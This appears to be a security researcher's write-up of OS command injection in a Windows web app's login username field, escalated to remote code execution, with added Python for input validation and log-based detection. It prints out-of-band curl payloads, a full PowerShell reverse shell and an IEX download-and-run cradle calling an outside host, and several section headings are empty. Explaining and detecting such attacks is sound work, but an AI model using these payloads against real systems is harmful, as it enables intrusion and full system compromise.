OS COMMAND INJECTION // POWERSHELL // REMOTE CODE EXECUTION
WEB APPLICATION SECURITY

OS Command Injection to Remote Code Execution

WINDOWS COMMAND INJECTION // OOB VALIDATION // POWERSHELL RCE

researcher
Naveen Jagadeesan
published
2024-12-10
platform
Windows / Web Application

Exploiting OS Command Injection for Remote Code Execution.

Target Background

The target was an asset management web application allowing users to create and manage assets through a centralized portal.

Authentication Mechanisms

The application supported multiple authentication methods:

Identifying the Attack Vector

Reconnaissance identified the login form as the primary attack surface.

The username field inside the JSON request body was discovered to be vulnerable to OS Command Injection: its value was passed to an operating-system command without validation.

Attack Surface Analysis

The application was hosted on a Windows environment which guided payload selection during exploitation.

The application responses returned boolean values:

Due to limited response visibility, out-of-band techniques were used to validate exploitation.

Request


POST /username_exists HTTP/1.1
Host: target.com
Cookie: session cookie: hello
User-Agent: Mozilla/5.0
Content-Type: application/json

{
    "username": "whoami"
}

Response


HTTP/1.1 200 OK
Server: nginx/1.22.1
Content-Type: text/html; charset=utf-8

{
    "success": false
}
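To make the root cause concrete, the following Python is an added example, not the target application's code (its backend is not shown in the write-up). It contrasts the flawed pattern, interpolating the JSON username into a command string that a shell parses, with a hardened handler for POST /username_exists that validates the field against a strict allowlist and answers from a data store without running any command. The lookup binary name lookup_user.exe, the in-memory user set, and the handler name are assumptions made for the example; the pipe-wrapped payload is the one from the write-up.

```python
import json
import re
import shlex

# Constructed in-memory user store standing in for the application's real lookup
# (assumption: the real backend and data source are not described on the page).
KNOWN_USERS = {"alice", "bob", "svc_assets"}

# Characters a legitimate account name needs, nothing more. The pipe, quotes,
# semicolons and parentheses used by the injection payloads are all rejected.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Shell operators that turn one command into several when a shell parses the string.
SHELL_OPERATORS = {"|", "||", ";", "&", "&&", "<", ">", ">>"}


def build_lookup_command_vulnerable(username: str) -> str:
    """Mirror of the flawed pattern: the JSON field lands verbatim in a command
    string that is then handed to a shell. lookup_user.exe is a hypothetical
    helper name; the binary the target app actually called is not on the page."""
    return f"lookup_user.exe {username}"


def shell_operators_in(command: str) -> list:
    """Tokenise the string the way a POSIX-style shell would and return the
    operators it contains. Used only to show that injected metacharacters become
    command separators rather than part of the username argument."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if tok in SHELL_OPERATORS]


def build_lookup_command_safe(username: str) -> list:
    """Hardened form: validate first, then pass the value as one argv element so
    that no shell ever parses it (subprocess.run(argv, shell=False))."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains disallowed characters")
    return ["lookup_user.exe", username]


def username_exists_handler(raw_body: str) -> dict:
    """Safe handler for POST /username_exists using the page's {"success": bool}
    response shape. Malformed or disallowed input yields success=false and never
    reaches any command at all; a user lookup needs a query, not a shell."""
    try:
        body = json.loads(raw_body)
        username = body["username"]
    except (ValueError, KeyError, TypeError):
        return {"success": False}
    if not isinstance(username, str) or not USERNAME_RE.fullmatch(username):
        return {"success": False}
    return {"success": username in KNOWN_USERS}


if __name__ == "__main__":
    payload = "|curl https://thevillagehacker.com/exploit/file.txt||"
    cmd = build_lookup_command_vulnerable(payload)
    print("vulnerable command string:", cmd)
    print("operators a shell would act on:", shell_operators_in(cmd))
    print("safe handler:", username_exists_handler(json.dumps({"username": payload})))
    print("safe handler:", username_exists_handler(json.dumps({"username": "alice"})))
```

The allowlist regex is the real fix; passing an argv list without a shell is the second layer, so that even a value that slips past validation is delivered as a single argument rather than parsed for operators.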

Out-of-Band Validation

Several OOB payloads were used during testing:

Timing differences and outbound requests confirmed successful command execution.

Example Payloads


|ping -c 5 127.0.0.1||

|curl https://thevillagehacker.com/exploit/file.txt||

The curl payload successfully downloaded a remote file from an attacker-controlled server, validating the injection vector.

Exploitation

Since the target operated in a Windows environment, a PowerShell reverse shell payload was selected.

This enabled a reverse TCP connection back to the attacker system.

PowerShell Reverse Shell


# Open a TCP connection from the target back to the listener at 10.10.10.10:80
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);
$stream = $client.GetStream();
# 64 KiB receive buffer
[byte[]]$bytes = 0..65535|%{0};
# Read each command from the socket, run it, and return its output with a prompt
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
    $sendback = (iex ". { $data } 2>&1" | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Final Exploitation Payload


|powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://thevillagehacker.com/mypowershell.ps1')"||

Injecting the above payload made the target server download and execute the script, establishing a reverse shell from the target back to the listener.

The application executed with administrative privileges, resulting in full system compromise.
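From the defender's side, every stage of this chain leaves a trace in the username field: bare recon commands, pipe-wrapped OOB probes, and the PowerShell download cradle. The following Python is an added example, not part of the write-up or of the target's tooling. It runs a small set of detection rules over a constructed application log that records the username value of each /username_exists request (the log format, timestamps and the benign entries are assumptions; the suspicious values are the payloads shown above) and returns findings a SOC could alert on.

```python
import re
from dataclasses import dataclass

# Constructed sample log: one line per /username_exists request with the submitted
# username. The format is an assumption for this example, not the target's real log.
SAMPLE_LOG = [
    "2024-12-10T10:01:02Z POST /username_exists username=alice",
    "2024-12-10T10:01:05Z POST /username_exists username=whoami",
    "2024-12-10T10:01:09Z POST /username_exists username=|ping -c 5 127.0.0.1||",
    "2024-12-10T10:01:14Z POST /username_exists username=|curl https://thevillagehacker.com/exploit/file.txt||",
    "2024-12-10T10:01:40Z POST /username_exists username=|powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('https://thevillagehacker.com/mypowershell.ps1')\"||",
    "2024-12-10T10:02:00Z POST /username_exists username=bob.smith",
]

SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2}

# (rule name, severity, pattern applied to the username value only)
RULES = [
    # A username that is exactly a recon command is the first probe an attacker sends.
    ("bare_recon_command", "low",
     re.compile(r"^(whoami|hostname|id|ver|systeminfo)$", re.I)),
    # Shell operators have no place in an account name.
    ("shell_metacharacter", "medium",
     re.compile(r"[|;&`$<>]")),
    # Tools used to generate out-of-band DNS/HTTP/ICMP traffic from the server.
    ("oob_network_tool", "high",
     re.compile(r"\b(curl|wget|ping|nslookup|certutil|bitsadmin)\b", re.I)),
    # Classic PowerShell download-and-execute cradle.
    ("powershell_download_cradle", "high",
     re.compile(r"powershell|Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient", re.I)),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    severity: str
    username: str


def extract_username(line: str) -> str:
    """Return the submitted username from a log line, or "" if the field is absent."""
    marker = "username="
    idx = line.find(marker)
    return line[idx + len(marker):] if idx >= 0 else ""


def scan_line(line: str, line_no: int = 0) -> list:
    """Apply every rule to the username value of one log line."""
    username = extract_username(line)
    return [Finding(line_no, name, sev, username)
            for name, sev, pattern in RULES if pattern.search(username)]


def scan_log(lines) -> list:
    """Scan a whole log, numbering lines from 0."""
    findings = []
    for n, line in enumerate(lines):
        findings.extend(scan_line(line, n))
    return findings


def flagged_lines(findings) -> list:
    """Sorted, de-duplicated line numbers that triggered at least one rule."""
    return sorted({f.line_no for f in findings})


def highest_severity(findings) -> str:
    """Worst severity seen, or "none" when nothing fired."""
    if not findings:
        return "none"
    return max((f.severity for f in findings), key=SEVERITY_ORDER.__getitem__)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} [{f.severity}] {f.rule}: {f.username[:60]}")
    print("highest severity:", highest_severity(scan_log(SAMPLE_LOG)))
```

The rules are deliberately narrow and applied only to the username value, so request paths and timestamps cannot trigger them; in practice the same patterns belong in a WAF rule for JSON login bodies and, on the host, in PowerShell script-block logging for the cradle itself.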

Impact

Root Cause

Conclusion

The exploitation of an OS Command Injection vulnerability inside the authentication workflow resulted in full remote code execution against the target infrastructure.

This case highlights the importance of:

Reference

Thank you for reading.